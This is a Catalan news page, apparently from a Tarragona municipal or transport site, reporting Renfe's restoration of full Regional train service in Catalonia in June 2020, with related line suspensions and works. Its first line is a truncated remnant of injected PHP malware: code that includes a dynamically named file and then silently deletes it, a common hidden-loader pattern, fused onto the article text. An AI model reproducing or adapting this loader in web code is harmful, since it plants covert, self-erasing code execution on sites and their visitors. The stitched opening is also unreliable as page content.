");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Renfe recupera el servei habitual en els trens Regionals de Rodalies de Catalunya
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

Renfe recupera el servei habitual en els trens Regionals de Rodalies de Catalunya (19/06/2020)

A partir de dissabte 20 de juny, Renfe recupera el 100% de l’oferta als serveis Regionals. D’aquesta manera es recupera el servei habitual a les línies R11, R12, R13, R14, R15, R16 i R17, així com a l’RT2 de rodalia del Camp de Tarragona. Aquesta mesura s’ha pres de forma coordinada amb el titular del servei i segueix els paràmetres marcats per les autoritats.

Aquest increment de l’oferta que actualment era del 50% coincideix amb els canvis permesos en quant a la mobilitat de les persones i es suma a la programació que ja es va restablir a les principals línies de rodalia de Barcelona.

L’RG1, RT1 i el tren Avant Tortosa – Barcelona continuaran sense prestar servei ja que els clients disposen d’altres serveis amb les que comparteixen recorregut. De la mateixa manera que la línia R7 Barcelona Sant Andreu Arenal – Cerdanyola Universitat es manté sense servei al restar tancada la UAB. L’R8 es manté al 50% de la seva oferta. En funció de com evolucioni la demanda es faran els canvis adients per adequar l’oferta de serveis a les necessitats de la ciutadania.

Modificació del servei R2 i R3

Des del passat 1 de juny, a causa de les obres de reconfiguració de les vies de l'estació de Sants executades per Adif, s’ha modificat el recorregut habitual de 3 trens de la línia R2 que es desvien pel túnel de Plaça de Catalunya, amb parada en aquesta estació, que habitualment circulaven per les estacions de Passeig de Gràcia i Barcelona-Estació de França.

Entre Ribes i Puigcerdà es prestarà servei alternatiu per carretera degut a les obres que Adif executarà al túnel de Toses entre el 22 de juny i el 7 de febrer del proper any.

Els clients poden consultar els horaris i itineraris a través dels webs rodaliesdecatalunya.cat i renfe.com, app Rodalies i Renfe Cercanías, així com al telèfon d’informació 900 41 00 41.

Font: Renfe

Renfe recupera el servei habitual en els trens Regionals de Rodalies de Catalunya

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona